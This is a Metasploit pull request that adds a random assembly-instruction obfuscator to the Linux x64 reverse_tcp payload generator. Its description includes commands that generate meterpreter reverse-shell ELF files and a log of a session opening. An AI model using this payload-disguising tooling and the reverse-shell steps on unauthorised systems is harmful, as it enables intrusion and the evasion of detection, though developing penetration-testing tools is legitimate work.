### PR TITLE
Add AssemblyObfuscator class 

### DIFF
--- a/lib/metasploit/framework/obfuscation/assembly_obfuscator.rb
+++ b/lib/metasploit/framework/obfuscation/assembly_obfuscator.rb
@@ -212,7 +212,7 @@ module Metasploit::Framework::Obfuscation
             elsif operands.size == 1
                 if mnemonic == 'push'
                     src = operands[0]
-                elsif mnemonic == 'pop'
+                elsif ['pop', 'inc', 'dec', 'neg', 'not'].include?(mnemonic)
                     dest = operands[0]
                 end
             end

--- a/lib/metasploit/framework/obfuscation/assembly_obfuscator.rb
+++ b/lib/metasploit/framework/obfuscation/assembly_obfuscator.rb
@@ -217,20 +217,6 @@ module Metasploit::Framework::Obfuscation
             valid_obfuscations
         end
 
-        def replace_placeholder(placeholder, line)
-            case placeholder
-            when '{src}'
-                
-            when '{dest}'
-                # logic to replace destination operand
-            when '{sp}'
-                # logic to replace stack pointer
-            when '{arch_val}'
-                # logic to replace architecture value
-            when '{random}'
-                # logic to replace with random value
-            end
-        end
 
         def get_sp
             @arch == 'x64' ? 'rsp' : 'esp'

--- a/lib/metasploit/framework/obfuscation/assembly_obfuscator.rb
+++ b/lib/metasploit/framework/obfuscation/assembly_obfuscator.rb
@@ -142,6 +142,18 @@ module Metasploit::Framework::Obfuscation
                         :custom_rule => nil
                     }
                 ],
+                'inc' => [
+                    {
+                        :instructions => ['add {dest}, 1'],
+                        :rules => ['{dest} == {reg}'],
+                        :custom_rule => nil
+                    },
+                    {
+                        :instructions => ['sub {dest}, {random}', 'add {dest}, {random}', 'add {dest}, 1'],
+                        :rules => ['{dest} == {reg}'],
+                        :custom_rule => nil
+                    }
+                ],
             }
         end
 

--- a/lib/metasploit/framework/obfuscation/assembly_obfuscator.rb
+++ b/lib/metasploit/framework/obfuscation/assembly_obfuscator.rb
@@ -54,32 +54,32 @@ module Metasploit::Framework::Obfuscation
                             true
                         }
                     },
-                    {
-                        :instructions => ['sub {dest}, {dest}', 'or {dest}, {src}'],
-                        :rules => [],
-                        :custom_rule => lambda { |operands|
-                            # ensure dest is a register, src != dest, and src is register or immediate
-                            src = operands[:src]
-                            dest = operands[:dst]
-                            return false unless dest && CommonRules.register_operand(dest)
-                            return false if src && dest && src.downcase == dest.downcase
-                            return true if CommonRules.register_operand(src)
-                            return true if CommonRules.immediate_value_below_32bit(src)
-                            false
-                        }
-                    },
-                    {
-                        :instructions => ['lea {dest}, [{src}]'],
-                        :rules => [],
-                        :custom_rule => lambda { |operands|
-                            # ensure both src and dest are registers (lea reg-to-reg only)
-                            src = operands[:src]
-                            dest = operands[:dst]
-                            return false unless src && CommonRules.register_operand(src)
-                            return false unless dest && CommonRules.register_operand(dest)
-                            true
-                        }
-                    }
+                    # {
+                    #     :instructions => ['sub {dest}, {dest}', 'or {dest}, {src}'],
+                    #     :rules => [],
+                    #     :custom_rule => lambda { |operands|
+                    #         # ensure dest is a register, src != dest, and src is register or immediate
+                    #         src = operands[:src]
+                    #         dest = operands[:dst]
+                    #         return false unless dest && CommonRules.register_operand(dest)
+                    #         return false if src && dest && src.downcase == dest.downcase
+                    #         return true if CommonRules.register_operand(src)
+                    #         return true if CommonRules.immediate_value_below_32bit(src)
+                    #         false
+                    #     }
+                    # },
+                    # {
+                    #     :instructions => ['lea {dest}, [{src}]'],
+                    #     :rules => [],
+                    #     :custom_rule => lambda { |operands|
+                    #         # ensure both src and dest are registers (lea reg-to-reg only)
+                    #         src = operands[:src]
+                    #         dest = operands[:dst]
+                    #         return false unless src && CommonRules.register_operand(src)
+                    #         return false unless dest && CommonRules.register_operand(dest)
+                    #         true
+                    #     }
+                    # }
                 ],
                 'add' => [
                     {
@@ -137,11 +137,11 @@ module Metasploit::Framework::Obfuscation
                         :rules => ['{src} == {reg}', '{dest} == {reg}'],
                         :custom_rule => nil
                     },
-                    {
-                        :instructions => ['xor {dest}, {src}', 'xor {src}, {dest}', 'xor {dest}, {src}'],
-                        :rules => ['{src} == {reg}', '{dest} == {reg}'],
-                        :custom_rule => nil
-                    }
+                #     {
+                #         :instructions => ['xor {dest}, {src}', 'xor {src}, {dest}', 'xor {dest}, {src}'],
+                #         :rules => ['{src} == {reg}', '{dest} == {reg}'],
+                #         :custom_rule => nil
+                #     }
                 ],
                 'inc' => [
                     {
@@ -149,11 +149,11 @@ module Metasploit::Framework::Obfuscation
                         :rules => ['{dest} == {reg}'],
                         :custom_rule => nil
                     },
-                    {
-                        :instructions => ['sub {dest}, {random}', 'add {dest}, {random}', 'add {dest}, 1'],
-                        :rules => ['{dest} == {reg}'],
-                        :custom_rule => nil
-                    }
+                #     {
+                #         :instructions => ['sub {dest}, {random}', 'add {dest}, 1', 'add {dest}, {random}'],
+                #         :rules => ['{dest} == {reg}'],
+                #         :custom_rule => nil
+                #     }
                 ],
                 'dec' => [
                     {
@@ -161,31 +161,31 @@ module Metasploit::Framework::Obfuscation
                         :rules => ['{dest} == {reg}'],
                         :custom_rule => nil
                     },
-                    {
-                        :instructions => ['add {dest}, {random}', 'sub {dest}, 1', 'sub {dest}, {random}'],
-                        :rules => ['{dest} == {reg}'],
-                        :custom_rule => nil
-                    }
+                #     {
+                #         :instructions => ['add {dest}, {random}', 'sub {dest}, 1', 'sub {dest}, {random}'],
+                #         :rules => ['{dest} == {reg}'],
+                #         :custom_rule => nil
+                #     }
                 ],
-                'neg' => [
-                    {
-                        :instructions => ['xor {dest}, -1', 'add {dest}, 1'],
-                        :rules => ['{dest} == {reg}'],
-                        :custom_rule => nil
-                    }
-                ],
-                'not' => [
-                    {
-                        :instructions => ['xor {dest}, -1'],
-                        :rules => ['{dest} == {reg}'],
-                        :custom_rule => nil
-                    },
-                    {
-                        :instructions => ['neg {dest}', 'sub {dest}, 1'],
-                        :rules => ['{dest} == {reg}'],
-                        :custom_rule => nil
-                    }
-                ],
+                # 'neg' => [
+                #     {
+                #         :instructions => ['xor {dest}, -1', 'add {dest}, 1'],
+                #         :rules => ['{dest} == {reg}'],
+                #         :custom_rule => nil
+                #     }
+                # ],
+                # 'not' => [
+                #     {
+                #         :instructions => ['xor {dest}, -1'],
+                #         :rules => ['{dest} == {reg}'],
+                #         :custom_rule => nil
+                #     },
+                #     {
+                #         :instructions => ['neg {dest}', 'sub {dest}, 1'],
+                #         :rules => ['{dest} == {reg}'],
+                #         :custom_rule => nil
+                #     }
+                # ],
             }
         end
 

--- a/lib/metasploit/framework/obfuscation/assembly_obfuscator.rb
+++ b/lib/metasploit/framework/obfuscation/assembly_obfuscator.rb
@@ -136,6 +136,11 @@ module Metasploit::Framework::Obfuscation
                         :rules => ['{src} == {reg}', '{dest} == {reg}'],
                         :custom_rule => nil
                     },
+                    {
+                        :instructions => ['xor {dest}, {src}', 'xor {src}, {dest}', 'xor {dest}, {src}'],
+                        :rules => ['{src} == {reg}', '{dest} == {reg}'],
+                        :custom_rule => nil
+                    }
                 ],
             }
         end

--- a/lib/metasploit/framework/obfuscation/assembly_obfuscator.rb
+++ b/lib/metasploit/framework/obfuscation/assembly_obfuscator.rb
@@ -179,6 +179,12 @@ module Metasploit::Framework::Obfuscation
             when '{dest} == {imm}'
                 dest = operands[:dst]
                 return is_immediate_value?(dest)
+            when '$or'
+                sub_rules = rule['$or']
+                return sub_rules.any? { |sub_rule| rule_validate_placeholder(sub_rule, operands) }
+            when '$and'
+                sub_rules = rule['$and']
+                return sub_rules.all? { |sub_rule| rule_validate_placeholder(sub_rule, operands) }
             else
                 return true
             end

--- a/lib/metasploit/framework/obfuscation/assembly_obfuscator.rb
+++ b/lib/metasploit/framework/obfuscation/assembly_obfuscator.rb
@@ -25,17 +25,23 @@ module Metasploit::Framework::Obfuscation
             @arch = arch
             @temp_registers = get_arch_registers.dup
             @obfuscation_matrix = {
-                'mov' => [ {
+                'mov' => [
+                    {
                         :instructions => ['xor {dest}, {dest}', 'add {dest}, {src}'],
                         :rules => [],
                         :custom_rule => lambda { |operands|
-                            # esure src is register or immediate value below 32-bit
+                            # ensure dest is a register, src != dest (xor dest,dest zeros it),
+                            # and src is a register or immediate value below 32-bit
                             src = operands[:src]
+                            dest = operands[:dst]
+                            return false unless dest && CommonRules.register_operand(dest)
+                            return false if src && dest && src.downcase == dest.downcase
                             return true if CommonRules.register_operand(src)
                             return true if CommonRules.immediate_value_below_32bit(src)
                             false
                         }
-                    }, {
+                    },
+                    {
                         :instructions => ['push {src}', 'pop {dest}'],
                         :rules => [],
                         :custom_rule => lambda { |operands|
@@ -44,6 +50,32 @@ module Metasploit::Framework::Obfuscation
                             dest = operands[:dst]
                             return false unless CommonRules.register_operand(src)
                             return false unless CommonRules.register_operand(dest)
+                            true
+                        }
+                    },
+                    {
+                        :instructions => ['sub {dest}, {dest}', 'or {dest}, {src}'],
+                        :rules => [],
+                        :custom_rule => lambda { |operands|
+                            # ensure dest is a register, src != dest, and src is register or immediate
+                            src = operands[:src]
+                            dest = operands[:dst]
+                            return false unless dest && CommonRules.register_operand(dest)
+                            return false if src && dest && src.downcase == dest.downcase
+                            return true if CommonRules.register_operand(src)
+                            return true if CommonRules.immediate_value_below_32bit(src)
+                            false
+                        }
+                    },
+                    {
+                        :instructions => ['lea {dest}, [{src}]'],
+                        :rules => [],
+                        :custom_rule => lambda { |operands|
+                            # ensure both src and dest are registers (lea reg-to-reg only)
+                            src = operands[:src]
+                            dest = operands[:dst]
+                            return false unless src && CommonRules.register_operand(src)
+                            return false unless dest && CommonRules.register_operand(dest)
                             true
                         }
                     }

--- a/lib/metasploit/framework/obfuscation/assembly_obfuscator.rb
+++ b/lib/metasploit/framework/obfuscation/assembly_obfuscator.rb
@@ -85,7 +85,7 @@ module Metasploit::Framework::Obfuscation
                         :instructions => ['inc {dest}', 'add {dest}, {src}', 'dec {dest}'],
                         :rules => [],
                         :custom_rule => lambda { |operands|
-                            # esure src is register or immediate value below 32-bit
+                            # ensure src is register or immediate value below 32-bit
                             src = operands[:src]
                             return true if CommonRules.register_operand(src)
                             return true if CommonRules.immediate_value_below_32bit(src)
@@ -103,7 +103,7 @@ module Metasploit::Framework::Obfuscation
                         :instructions => ['dec {dest}', 'sub {dest}, {src}', 'inc {dest}'],
                         :rules => [],
                         :custom_rule => lambda { |operands|
-                            # esure src is register or immediate value below 32-bit
+                            # ensure src is register or immediate value below 32-bit
                             src = operands[:src]
                             return true if CommonRules.register_operand(src)
                             return true if CommonRules.immediate_value_below_32bit(src)

--- a/lib/metasploit/framework/obfuscation/assembly_obfuscator.rb
+++ b/lib/metasploit/framework/obfuscation/assembly_obfuscator.rb
@@ -154,6 +154,18 @@ module Metasploit::Framework::Obfuscation
                         :custom_rule => nil
                     }
                 ],
+                'dec' => [
+                    {
+                        :instructions => ['sub {dest}, 1'],
+                        :rules => ['{dest} == {reg}'],
+                        :custom_rule => nil
+                    },
+                    {
+                        :instructions => ['add {dest}, {random}', 'sub {dest}, 1', 'sub {dest}, {random}'],
+                        :rules => ['{dest} == {reg}'],
+                        :custom_rule => nil
+                    }
+                ],
             }
         end
 

--- a/lib/metasploit/framework/obfuscation/assembly_obfuscator.rb
+++ b/lib/metasploit/framework/obfuscation/assembly_obfuscator.rb
@@ -166,6 +166,13 @@ module Metasploit::Framework::Obfuscation
                         :custom_rule => nil
                     }
                 ],
+                'neg' => [
+                    {
+                        :instructions => ['xor {dest}, -1', 'add {dest}, 1'],
+                        :rules => ['{dest} == {reg}'],
+                        :custom_rule => nil
+                    }
+                ],
             }
         end
 

--- a/lib/metasploit/framework/obfuscation/assembly_obfuscator.rb
+++ b/lib/metasploit/framework/obfuscation/assembly_obfuscator.rb
@@ -1,0 +1,302 @@
+module Metasploit::Framework::Obfuscation
+    DEBUG = false
+    class AssemblyObfuscator
+
+        template_matrix = {:instructions => [], :rules => [''], :custom_rule => nil}
+
+        module CommonRules
+            def self.register_operand(operand)
+                all_registers = %w[rax rbx rcx rdx rsi rdi rsp rbp r8 r9 r10 r11 r12 r13 r14 r15 eax ebx ecx edx esi edi esp ebp]
+                all_registers.include?(operand.downcase)
+            end
+
+            def self.immediate_value_below_32bit(operand)
+                if operand.start_with?('0x')
+                    value = operand.to_i(16)
+                else
+                    value = operand.to_i
+                end
+                value >= 0 && value <= 0xFFFFFFFF
+            end
+        end
+
+        def initialize(assembly_code, arch: 'x64')
+            @assembly_code = assembly_code
+            @arch = arch
+            @temp_registers = get_arch_registers.dup
+            @obfuscation_matrix = {
+                'mov' => [ {
+                        :instructions => ['xor {dest}, {dest}', 'add {dest}, {src}'],
+                        :rules => [],
+                        :custom_rule => lambda { |operands|
+                            # esure src is register or immediate value below 32-bit
+                            src = operands[:src]
+                            return true if CommonRules.register_operand(src)
+                            return true if CommonRules.immediate_value_below_32bit(src)
+                            false
+                        }
+                    }, {
+                        :instructions => ['push {src}', 'pop {dest}'],
+                        :rules => [],
+                        :custom_rule => lambda { |operands|
+                            # ensure src and dest are registers
+                            src = operands[:src]
+                            dest = operands[:dst]
+                            return false unless CommonRules.register_operand(src)
+                            return false unless CommonRules.register_operand(dest)
+                            true
+                        }
+                    }
+                ],
+                'add' => [
+                    {
+                        :instructions => ['inc {dest}', 'add {dest}, {src}', 'dec {dest}'],
+                        :rules => [],
+                        :custom_rule => lambda { |operands|
+                            # esure src is register or immediate value below 32-bit
+                            src = operands[:src]
+                            return true if CommonRules.register_operand(src)
+                            return true if CommonRules.immediate_value_below_32bit(src)
+                            false
+                        } 
+                    },
+                    {
+                        :instructions => ['sub {dest}, {random}', 'add {dest}, {src}', 'add {dest}, {random}'],
+                        :rules => ['{dest} == {reg}'],
+                        :custom_rule => nil
+                    }
+                ],
+                'sub' => [
+                    {
+                        :instructions => ['dec {dest}', 'sub {dest}, {src}', 'inc {dest}'],
+                        :rules => [],
+                        :custom_rule => lambda { |operands|
+                            # esure src is register or immediate value below 32-bit
+                            src = operands[:src]
+                            return true if CommonRules.register_operand(src)
+                            return true if CommonRules.immediate_value_below_32bit(src)
+                            false
+                        } 
+                    },
+                    {
+                        :instructions => ['add {dest}, {random}', 'sub {dest}, {src}', 'sub {dest}, {random}'],
+                        :rules => ['{dest} == {reg}'],
+                        :custom_rule => nil
+                    }
+                ],
+                'push' => [
+                    {
+                        :instructions => ['sub {sp}, {arch_val}', 'mov [{sp}], {src}'],
+                        :rules => ['{src} == {reg}'],
+                        :custom_rule => nil
+                    },
+                ],
+                'pop' => [
+                    {
+                        :instructions => ['mov {dest}, [{sp}]', 'add {sp}, {arch_val}'],
+                        :rules => ['{dest} == {reg}'],
+                        :custom_rule => nil
+                    },
+                ],
+                'xchg' => [
+                    {
+                        :instructions => ['push {dest}', 'mov {dest}, {src}', 'pop {src}'],
+                        :rules => ['{src} == {reg}', '{dest} == {reg}'],
+                        :custom_rule => nil
+                    },
+                ],
+            }
+        end
+
+        def get_arch_registers
+            if @arch == 'x64'
+                %w[rax rbx rcx rdx rsi rdi rsp rbp r8 r9 r10 r11 r12 r13 r14 r15]
+            else
+                %w[eax ebx ecx edx esi edi esp ebp]
+            end
+        end
+
+        def is_register?(operand)
+            puts "DEBUG: Checking if operand '#{operand}' is a register 1" if DEBUG
+            all_registers = get_arch_registers
+            all_registers.include?(operand.downcase)
+        end
+
+        def source_and_destination_operands(line)
+            mnemonic, *operands = line.strip.split
+            src = nil
+            dest = nil
+            if operands.size == 2
+                src = operands[1]
+                dest = operands[0].chomp(',')
+            elsif operands.size == 1
+                if mnemonic == 'push'
+                    src = operands[0]
+                elsif mnemonic == 'pop'
+                    dest = operands[0]
+                end
+            end
+            { src: src, dst: dest }
+        end
+        def avaiable_temp_registers(assembly_code, exclude_regs = [])
+            all_registers = get_arch_registers
+            used_registers = []
+            assembly_code.lines.each do |line|
+                tokens = line.strip.split
+                next if tokens.empty?
+                mnemonic = tokens[0]
+                operands = tokens[1..-1].join(' ').split(',').map(&:strip)
+                operands.each do |op|
+                    if is_register?(op) && !used_registers.include?(op) && !exclude_regs.include?(op)
+                        used_registers << op
+                    end
+                end
+            end
+            temp_registers = all_registers - used_registers - exclude_regs
+            temp_registers
+        end
+
+        def is_immediate_value?(operand)
+            immediate_value_regex = /^(0x[0-9a-fA-F]+|\d+)$/
+            !!(operand =~ immediate_value_regex)
+        end
+
+        def is_register_operand?(operand)
+            is_register?(operand) || operand.start_with?('[') && operand.end_with?(']') && is_register?(operand[1..-2])
+        end
+
+        def rule_validate_placeholder(rule, operands)
+            case rule
+            when '{src} == {reg}'
+                src = operands[:src]
+                return is_register_operand?(src)
+            when '{dest} == {reg}'
+                dest = operands[:dst]
+                return is_register_operand?(dest)
+            when '{src} == {imm}'
+                src = operands[:src]
+                return is_immediate_value?(src)
+            when '{dest} == {imm}'
+                dest = operands[:dst]
+                return is_immediate_value?(dest)
+            else
+                return true
+            end
+        end
+        def validate_obfuscation_rule(rule, operands)
+            return rule_validate_placeholder(rule, operands) if rule.is_a?(String)
+            false
+        end
+
+        def validate_obfuscation_rules(rules, operands, custom_rule = nil)
+            is_valid = true
+            rules.each do |rule|
+                is_valid = validate_obfuscation_rule(rule, operands)
+                break unless is_valid
+            end
+            if is_valid && custom_rule
+                is_valid = custom_rule.call(operands)
+            end
+            is_valid
+        end
+
+        def get_avaiable_obfuscations_for_line(line)
+            mnemonic, *operands = line.strip.split
+            operands_hash = source_and_destination_operands(line)
+            valid_obfuscations = []
+            possible_obfuscations = @obfuscation_matrix[mnemonic]
+            return [] if possible_obfuscations.nil? || possible_obfuscations.empty?
+            possible_obfuscations.each do |obf|
+                rules = obf[:rules] || []
+                custom_rule = obf[:custom_rule] || nil
+                if validate_obfuscation_rules(rules, operands_hash, custom_rule)
+                    puts "DEBUG: Valid obfuscation found for line '#{line.strip}': #{obf[:instructions].join(' | ')}" if DEBUG
+                    valid_obfuscations << obf
+                end
+            end
+            valid_obfuscations
+        end
+
+        def replace_placeholder(placeholder, line)
+            case placeholder
+            when '{src}'
+                
+            when '{dest}'
+                # logic to replace destination operand
+            when '{sp}'
+                # logic to replace stack pointer
+            when '{arch_val}'
+                # logic to replace architecture value
+            when '{random}'
+                # logic to replace with random value
+            end
+        end
+
+        def get_sp
+            @arch == 'x64' ? 'rsp' : 'esp'
+        end
+
+
+        def obfuscate_line(line, obfuscation)
+            obfuscated_line_output = []
+            mnemonic = line.split.first
+            operands = source_and_destination_operands(line)
+            sp = get_sp
+            random_value = rand(1..100)
+            obfuscation[:instructions].each do |instr|
+                random_instr = instr.dup
+                random_instr = random_instr.split(';').first.strip
+                random_instr.gsub!('{src}', operands[:src].to_s) if operands[:src]
+                random_instr.gsub!('{dest}', operands[:dst].to_s) if operands[:dst]
+                random_instr.gsub!('{sp}', sp)
+                random_instr.gsub!('{arch_val}', @arch == 'x64' ? '8' : '4')
+                random_instr.gsub!('{random}', random_value.to_s)
+                obfuscated_line_output << random_instr + "\n"
+                puts "DEBUG: Generated obfuscated instruction: #{random_instr}" if DEBUG
+            end
+            obfuscated_line_output
+        end
+
+        def obfuscate_once(code)
+            result_lines = []
+            lines = code.lines if code.is_a?(String)
+            lines = code if code.is_a?(Array)
+
+            lines.map do |line|
+                # remove multiple spaces
+                line = line.gsub(/\s+/, ' ').strip
+                line = line.gsub(/\t+/, ' ').strip
+                line = line.split(';').first.strip if line.include?(';')
+                next if line.empty?
+                line += "\n" unless line.end_with?("\n")
+
+                puts "DEBUG: Processing line: #{line.strip}" if DEBUG
+                possible_obfuscations = get_avaiable_obfuscations_for_line(line)
+                if !possible_obfuscations.empty?
+                    random_obfuscation = possible_obfuscations.sample
+                    puts "DEBUG: Obfuscating line: #{line.strip}" if DEBUG
+                    obfuscated_lines = obfuscate_line(line, random_obfuscation)
+                    # puts "DEBUG: Obfuscating line: #{line.strip} -> #{obfuscated_lines.map(&:strip).join(' | ')}" if DEBUG
+                else
+                    puts "DEBUG: Skipping line: #{line.strip}" if DEBUG
+                    obfuscated_lines = [line]
+                end
+
+                # append obfuscated lines to result
+                result_lines.concat(obfuscated_lines)
+            end
+            puts "DEBUG: Resulting lines: #{result_lines}}" if DEBUG
+            result_lines.flatten.join
+        end
+
+        def obfuscate(passes = 1)
+            obfuscated_code = @assembly_code.dup
+            for pass in 1..passes
+                puts "Executing pass number #{pass}..." if DEBUG
+                obfuscated_code_result = obfuscate_once(obfuscated_code)
+                puts "DEBUG: Obfuscated code after pass #{pass}:\n#{obfuscated_code_result}" if DEBUG
+            end
+            obfuscated_code_result
+        end
+    end
+end

--- a/lib/metasploit/framework/obfuscation/assembly_obfuscator.rb
+++ b/lib/metasploit/framework/obfuscation/assembly_obfuscator.rb
@@ -173,6 +173,18 @@ module Metasploit::Framework::Obfuscation
                         :custom_rule => nil
                     }
                 ],
+                'not' => [
+                    {
+                        :instructions => ['xor {dest}, -1'],
+                        :rules => ['{dest} == {reg}'],
+                        :custom_rule => nil
+                    },
+                    {
+                        :instructions => ['neg {dest}', 'sub {dest}, 1'],
+                        :rules => ['{dest} == {reg}'],
+                        :custom_rule => nil
+                    }
+                ],
             }
         end
 

--- a/lib/metasploit/framework/obfuscation/assembly_obfuscator.rb
+++ b/lib/metasploit/framework/obfuscation/assembly_obfuscator.rb
@@ -20,9 +20,10 @@ module Metasploit::Framework::Obfuscation
             end
         end
 
-        def initialize(assembly_code, arch: 'x64')
+        def initialize(assembly_code, arch: 'x64', percentual: 50)
             @assembly_code = assembly_code
             @arch = arch
+            @percentual = percentual
             @temp_registers = get_arch_registers.dup
             @obfuscation_matrix = {
                 'mov' => [
@@ -344,7 +345,7 @@ module Metasploit::Framework::Obfuscation
 
                 puts "DEBUG: Processing line: #{line.strip}" if DEBUG
                 possible_obfuscations = get_avaiable_obfuscations_for_line(line)
-                if !possible_obfuscations.empty?
+                if !possible_obfuscations.empty? && rand(100) < @percentual
                     random_obfuscation = possible_obfuscations.sample
                     puts "DEBUG: Obfuscating line: #{line.strip}" if DEBUG
                     obfuscated_lines = obfuscate_line(line, random_obfuscation)
@@ -365,10 +366,10 @@ module Metasploit::Framework::Obfuscation
             obfuscated_code = @assembly_code.dup
             for pass in 1..passes
                 puts "Executing pass number #{pass}..." if DEBUG
-                obfuscated_code_result = obfuscate_once(obfuscated_code)
-                puts "DEBUG: Obfuscated code after pass #{pass}:\n#{obfuscated_code_result}" if DEBUG
+                obfuscated_code = obfuscate_once(obfuscated_code)
+                puts "DEBUG: Obfuscated code after pass #{pass}:\n#{obfuscated_code}" if DEBUG
             end
-            obfuscated_code_result
+            obfuscated_code
         end
     end
 end

--- a/lib/msf/core/obfuscation/assembly_obfuscation.rb
+++ b/lib/msf/core/obfuscation/assembly_obfuscation.rb
@@ -1,0 +1,27 @@
+require 'metasploit/framework/obfuscation/assembly_obfuscator'
+module Msf::Obfuscation::AssemblyObfuscation
+  def initialize(info = {})
+    super
+    register_advanced_options(
+      [
+        Msf::OptBool.new('AssemblyObfuscation::Enable', [ false, 'Obfuscate the assembly instructions in the payload' ]),
+        Msf::OptInt.new('AssemblyObfuscation::Passes', [ false, 'Number of obfuscation passes to applys', 1 ]),
+        Msf::OptInt.new('AssemblyObfuscation::Percentual', [ false, 'Percentage of instructions to obfuscate (0-100)', 0 ])
+      ], self.class
+    )
+  end
+
+  def obfuscate_assembly(arch, assembly)
+    if datastore['AssemblyObfuscation::Enable']
+      passes = datastore['AssemblyObfuscation::Passes'] || 1
+      percentual = datastore['AssemblyObfuscation::Percentual'] || 50
+      if percentual == 100 && passes > 1
+        print_warning("Obfuscation is set to 100%, so only one pass will be applied regardless of the number of passes specified.")
+        passes = 1
+      end
+      obfuscator = Metasploit::Framework::Obfuscation::AssemblyObfuscator.new(assembly, arch: arch, percentual: percentual)
+      assembly = obfuscator.obfuscate(passes)
+    end
+    assembly
+  end
+end

--- a/lib/msf/core/obfuscation/assembly_obfuscation.rb
+++ b/lib/msf/core/obfuscation/assembly_obfuscation.rb
@@ -15,10 +15,6 @@ module Msf::Obfuscation::AssemblyObfuscation
     if datastore['AssemblyObfuscation::Enable']
       passes = datastore['AssemblyObfuscation::Passes'] || 1
       percentual = datastore['AssemblyObfuscation::Percentual'] || 50
-      if percentual == 100 && passes > 1
-        print_warning("Obfuscation is set to 100%, so only one pass will be applied regardless of the number of passes specified.")
-        passes = 1
-      end
       obfuscator = Metasploit::Framework::Obfuscation::AssemblyObfuscator.new(assembly, arch: arch, percentual: percentual)
       assembly = obfuscator.obfuscate(passes)
     end

--- a/lib/msf/core/payload/linux/x64/reverse_tcp.rb
+++ b/lib/msf/core/payload/linux/x64/reverse_tcp.rb
@@ -1,5 +1,6 @@
 # -*- coding: binary -*-
 
+require 'metasploit/framework/obfuscation/assembly_obfuscator'
 module Msf
 
 
@@ -50,6 +51,10 @@ module Payload::Linux::X64::ReverseTcp
   #
   def generate_reverse_tcp(opts={})
     asm = asm_reverse_tcp(opts)
+    # puts "DEBUG: Generated assembly before obfuscation:\n#{asm}"
+    # obfuscator = Metasploit::Framework::Obfuscation::AssemblyObfuscator.new(asm, arch: 'x64')
+    # asm = obfuscator.obfuscate(1)
+    # puts "DEBUG: Generated assembly after obfuscation:\n#{asm}"
     Metasm::Shellcode.assemble(Metasm::X64.new, asm).encode_string
   end
 

--- a/lib/msf/core/payload/linux/x64/reverse_tcp.rb
+++ b/lib/msf/core/payload/linux/x64/reverse_tcp.rb
@@ -1,6 +1,5 @@
 # -*- coding: binary -*-
 
-require 'metasploit/framework/obfuscation/assembly_obfuscator'
 module Msf
 
 
@@ -14,6 +13,7 @@ module Payload::Linux::X64::ReverseTcp
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Linux::X64::Prepends
+  include Msf::Obfuscation::AssemblyObfuscation
 
   #
   # Generate the first stage
@@ -51,10 +51,7 @@ module Payload::Linux::X64::ReverseTcp
   #
   def generate_reverse_tcp(opts={})
     asm = asm_reverse_tcp(opts)
-    # puts "DEBUG: Generated assembly before obfuscation:\n#{asm}"
-    # obfuscator = Metasploit::Framework::Obfuscation::AssemblyObfuscator.new(asm, arch: 'x64')
-    # asm = obfuscator.obfuscate(1)
-    # puts "DEBUG: Generated assembly after obfuscation:\n#{asm}"
+    asm = obfuscate_assembly('x64', asm) if respond_to?(:obfuscate_assembly)
     Metasm::Shellcode.assemble(Metasm::X64.new, asm).encode_string
   end
 


### PR DESCRIPTION
This pull request introduces an assembly instruction obfuscation feature for payloads, primarily targeting x64 Linux reverse TCP payloads. It adds a configurable obfuscation system that can be enabled via advanced options, allowing users to specify the number of obfuscation passes and the percentage of instructions to obfuscate. The main logic for obfuscation is implemented in a new `AssemblyObfuscator` class, and the payload generation pipeline is updated to use it when enabled.

**Assembly Obfuscation System:**

* Added a new `Metasploit::Framework::Obfuscation::AssemblyObfuscator` class that implements various assembly instruction obfuscation techniques, including rule-based and randomized instruction substitutions for common x86/x64 instructions. This class supports multiple passes and a configurable obfuscation percentage.
* Implemented operand validation, rule checking, and instruction template application to ensure safe and effective obfuscation of assembly code.

**Integration with Payload Generation:**

* Introduced a new module `Msf::Obfuscation::AssemblyObfuscation` that registers advanced options for enabling assembly obfuscation, setting the number of passes, and specifying the obfuscation percentage. This module provides the `obfuscate_assembly` method to apply the obfuscator.
* Included the new obfuscation module in the `Payload::Linux::X64::ReverseTcp` class, making the feature available for this payload.
* Updated the payload generation process to obfuscate assembly code before assembling it, if the obfuscation feature is enabled.

How to test:

```
use payload/linux/x64/meterpreter/reverse_tcp
set LHOST <ip>
generate -f elf -o ~/metsrv.noobf.elf
set AssemblyObfuscation::Enable true
generate -f elf -o ~/metsrv.obf.1.elf
```

You should get a shell from both of them.

currently i tested:

- 10 passes
- 100 percentage

it created a 458474 bytes executable.... I would keep the passes below 5 if percentual is 100
```
msf payload(linux/x64/meterpreter/reverse_tcp) > set assemblyobfuscation::passes 5
assemblyobfuscation::passes => 5
msf payload(linux/x64/meterpreter/reverse_tcp) > generate -f elf -o ~/Public/obfs/m.elf
[*] Writing 4899 bytes to ~/Public/obfs/m.elf...
msf payload(linux/x64/meterpreter/reverse_tcp) > generate -f elf -o ~/Public/obfs/m.elf
[*] Writing 5340 bytes to ~/Public/obfs/m.elf...
msf payload(linux/x64/meterpreter/reverse_tcp) > generate -f elf -o ~/Public/obfs/m.elf
[*] Writing 5434 bytes to ~/Public/obfs/m.elf...
msf payload(linux/x64/meterpreter/reverse_tcp) > set assemblyobfuscation::passes 10
assemblyobfuscation::passes => 10
msf payload(linux/x64/meterpreter/reverse_tcp) > generate -f elf -o ~/Public/obfs/m.elf
[*] Writing 458474 bytes to ~/Public/obfs/m.elf...
msf payload(linux/x64/meterpreter/reverse_tcp) >
[*] Sending stage (3090404 bytes) to 127.0.0.1
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:44052) at 2026-02-20 17:13:27 +0100
```

```
[0x00400078]> aaa
INFO: Analyze all flags starting with sym. and entry0 (aa)
INFO: Analyze imports (af@@@i)
INFO: Analyze entrypoint (af@ entry0)
INFO: Analyze symbols (af@@@s)
INFO: Analyze all functions arguments/locals (afva@@@F)
INFO: Analyze function calls (aac)
INFO: Analyze len bytes of instructions for references (aar)
INFO: Finding and parsing C++ vtables (avrr)
INFO: Analyzing methods (af @@ method.*)
INFO: Recovering local variables (afva@@@F)
INFO: Type matching analysis for all functions (aaft)
INFO: Propagate noreturn information (aanr)
INFO: Use -AA or aaaa to perform additional experimental analysis
[0x00400078]> pd 30
            ;-- rip:
┌ 458354: entry0 (int64_t arg3);
│           ; arg int64_t arg3 @ rdx
│           0x00400078      31ff           xor edi, edi
│           0x0040007a      6a09           push 9                      ; 9
│           0x0040007c      4831c0         xor rax, rax
│           0x0040007f      48ffc8         dec rax
│           0x00400082      4883e801       sub rax, 1
│           0x00400086      48ffc0         inc rax
│           0x00400089      48ffc0         inc rax
│           0x0040008c      4883c047       add rax, 0x47               ; 71
│           0x00400090      48ffc8         dec rax
